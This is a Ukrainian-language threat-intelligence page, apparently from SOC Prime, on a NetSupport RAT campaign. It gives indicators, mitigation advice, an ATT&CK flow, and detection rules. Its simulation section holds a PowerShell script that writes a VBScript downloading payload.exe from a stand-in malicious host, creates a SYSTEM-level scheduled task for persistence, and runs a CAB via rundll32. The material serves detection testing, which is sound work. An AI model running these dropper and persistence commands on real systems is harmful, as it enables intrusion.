SOC Prime Bias: Середній

03 Jun 2026 16:32 UTC
newspaper icon SANS Internet Storm Center

NetSupport RAT доставляється за допомогою невідомого завантажувача

Author Photo
SOC Prime Team linkedin icon Стежити
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Резюме

Раніше невідомий засіб віддаленого доступу був помічений під час доставки небезпечного пакету NetSupport Manager RAT. Початковий шкідливий ПЗ спілкувався з сервером командування та контролю на 89.110.110.119 через TCP порт 443 використовуючи закодований трафік. Кампанія, відстежена як SmartApeSG ClickFix, залежала від шкідливих скриптів та архіву CAB для встановлення NetSupport RAT на системи жертв.

Розслідування

Розслідування виявило кілька індикаторів, включаючи шкідливі URL-адреси, IP-адреси та файли, записані у ProgramData директорію. Початковий RAT доставив пакетний скрипт, який вилучив і встановив NetSupport RAT з архіву setup.cab . Після завершення встановлення допоміжні файли були видалені, щоб зменшити видимі сліди активності.

Пом’якшення

Організації повинні блокувати мережевий трафік на виявлені небезпечні IP-адреси та домени та моніторити створення згаданих файлів у ProgramData. Захисні засоби кінцевих точок повинні виявляти виконання підозрілих VBScript та пакетних файлів, у той час як мережевий моніторинг повинен застосовувати суворіший контроль до закодованого трафіку через порт 443.

Реагування

Захисники повинні сигналізувати про перераховані індикатори, ізолювати уражені системи та проводити судово-медичний аналіз, щоб виявити будь-які механізми збереження. Шкідливі файли слід видалити, будь-які несанкціоновані зміни слід скасувати, а політику брандмауера потрібно оновити для блокування вихідного зв’язку з виявленою інфраструктурою командування та контролю.

graph TB %% Визначення класу classDef action fill:#c2f0c2 node_a[“<b>Дія</b> – <b>T1204.001 Виконання користувачем: шкідливе посилання</b><br/><b>Опис</b>: Жертва завантажує шкідливий JavaScript зі скомпрометованої сторінки.”] class node_a action node_b[“<b>Дія</b> – <b>T1027.006 Обфусковані файли: HTML Smuggling</b><br/><b>Опис</b>: Доставка закодованого вмісту за допомогою техніки HTML smuggling.”] class node_b action node_c[“<b>Дія</b> – <b>T1059.005 Інтерпретатор команд і скриптів: Visual Basic</b><br/><b>Опис</b>: processor.vbs розгортає token.bat у системі.”] class node_c action node_d[“<b>Дія</b> – Виконання batch-скрипта<br/><b>Результат</b>: Розпаковує NetSupport RAT на хості.”] class node_d action node_e[“<b>Дія</b> – <b>T1547.014 Active Setup</b> та <b>T1546.007 Netsh Helper DLL</b><br/><b>Опис</b>: RAT розміщується в C:\\ProgramData\\UpdateInstaller для забезпечення персистентності.”] class node_e action node_f[“<b>Дія</b> – <b>T1574.007 Перехоплення шляху</b> та <b>T1574.005 Слабкі права інсталятора</b><br/><b>Опис</b>: Підвищення привілеїв через маніпуляцію PATH і слабкі дозволи інсталятора.”] class node_f action node_g[“<b>Дія</b> – <b>T1564 Приховування артефактів</b> та <b>T1564.010 Підміна аргументів процесу</b><br/><b>Опис</b>: Видалення staging-файлів і підміна аргументів процесів для уникнення виявлення.”] class node_g action node_h[“<b>Дія</b> – <b>T1571 Нестандартний порт</b> та <b>T1071.001 Вебпротоколи</b><br/><b>Опис</b>: C2-комунікація через TCP 443 із використанням зашифрованих вебпротоколів.”] class node_h action %% Зв’язки node_a –> node_b –> node_c –> node_d –> node_e –> node_f –> node_g –> node_h

Потік атаки

Виявлення

LOLBAS WScript / CScript (через process_creation)

Команда SOC Prime
02 червня 2026

Переглянути

Можливе виконання двійкового файлу NetSupport Manager із підозрілого каталогу (через process_creation)

Команда SOC Prime
02 червня 2026

Переглянути

Підозріле командувальне управління через незвичайний домен верхнього рівня (TLD) DNS запит (через dns)

Команда SOC Prime
02 червня 2026

Переглянути

IOC (HashSha256) для виявлення: Невизначений RAT поширює NetSupport RAT

Правила AI від SOC Prime
02 червня 2026

Переглянути

IOC (SourceIP) для виявлення: Невизначений RAT поширює NetSupport RAT

Правила AI від SOC Prime
02 червня 2026

Переглянути

IOC (DestinationIP) для виявлення: Невизначений RAT поширює NetSupport RAT

Правила AI від SOC Prime
02 червня 2026

Переглянути

Виявлення інфекції NetSupport RAT через скрипт і файли CAB [Подія файлу Windows]

Правила AI від SOC Prime
02 червня 2026

Переглянути

Виявлення початкового та NetSupport RAT C2 зв’язку [Мережеве з’єднання Windows]

Правила AI від SOC Prime
02 червня 2026

Переглянути

Виконання симуляції

Передумова: Телеметрія та попередня перевірка базової лінії повинні бути успішно пройдені.

Обґрунтування: Цей розділ детально описує точне виконання техніки противника (TTP), призначеної для запуску правила виявлення. Команди та наратив повинні безпосередньо відображати ідентифіковані TTP та прагнути створити точну телеметрію, яку очікує логіка виявлення.

  • Опис атаки та команди:
    Атакуючий, який отримав початковий доступ до хоста Windows, скидає три шкідливі артефакти до C:ProgramData:

    1. processor.vbs – сценарій Visual Basic, який завантажує головний двійковий файл RAT.
    2. token.bat – пакетний файл, який створює завдання, що планується для збереження.
    3. setup.cab – архів CAB, який містить DLL, що завантажується в C:ProgramData і пізніше завантажується через rundll32.exe.

    Потім атакуючий виконує кожний файл по черзі, що викликає події створення процесу, які містять точні шляхи файлів, необхідні для правила Sigma.

  • Сценарій регресійного тестування:

    # netSupport_RAT_simulation.ps1
# -------------------------------------------------
# ПРИЗНАЧЕННЯ: Відтворення телеметрії інфекції NetSupport RAT
# -------------------------------------------------

$targetDir = "C:ProgramData"
# Переконайтесь, що каталог існує
if (-Not (Test-Path $targetDir)) { New-Item -ItemType Directory -Path $targetDir -Force }

# 1. Скидання processor.vbs
$vbsPath = Join-Path $targetDir "processor.vbs"
Set-Content -Path $vbsPath -Value @"
Set objXML = CreateObject("MSXML2.XMLHTTP")
objXML.open "GET","http://malicious.example.com/payload.exe",False
objXML.send
"@"

# 2. Скидання token.bat
$batPath = Join-Path $targetDir "token.bat"
Set-Content -Path $batPath -Value @"
schtasks /create /tn "NetSupportPersist" /tr "$targetDirsetup.cab" /sc onlogon /ru System
"@

# 3. Скидання setup.cab (підроблений CAB, що містить текстовий файл)
$cabPath = Join-Path $targetDir "setup.cab"
$tempDir = "$env:TEMPcab_temp"
New-Item -ItemType Directory -Path $tempDir -Force | Out-Null
Set-Content -Path "$tempDirdummy.txt" -Value "заповнювач"
# Створення CAB – вимагає makecab (вбудований інструмент Windows)
& makecab.exe "$tempDirdummy.txt" $cabPath

# Фаза виконання – запуск виявлень
Write-Host "`n[+] Виконується processor.vbs"
cscript.exe //B //Nologo $vbsPath

Write-Host "[+] Виконується token.bat"
cmd.exe /c $batPath

Write-Host "[+] Виконується setup.cab через rundll32 (симульоване завантаження)"
rundll32.exe "$cabPath",DummyEntryPoint

# Очищення тимчасової папки, використаної для створення CAB
Remove-Item -Recurse -Force $tempDir

  • Команди очищення:

    # netSupport_RAT_cleanup.ps1
$targetDir = "C:ProgramData"
$files = @("processor.vbs","token.bat","setup.cab")
foreach ($f in $files) {
    $fullPath = Join-Path $targetDir $f
    if (Test-Path $fullPath) { Remove-Item -Force $fullPath }
}
# Видалити створене token.bat завдання
schtasks /delete /tn "NetSupportPersist" /f
Write-Host "Очистка завершена."

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно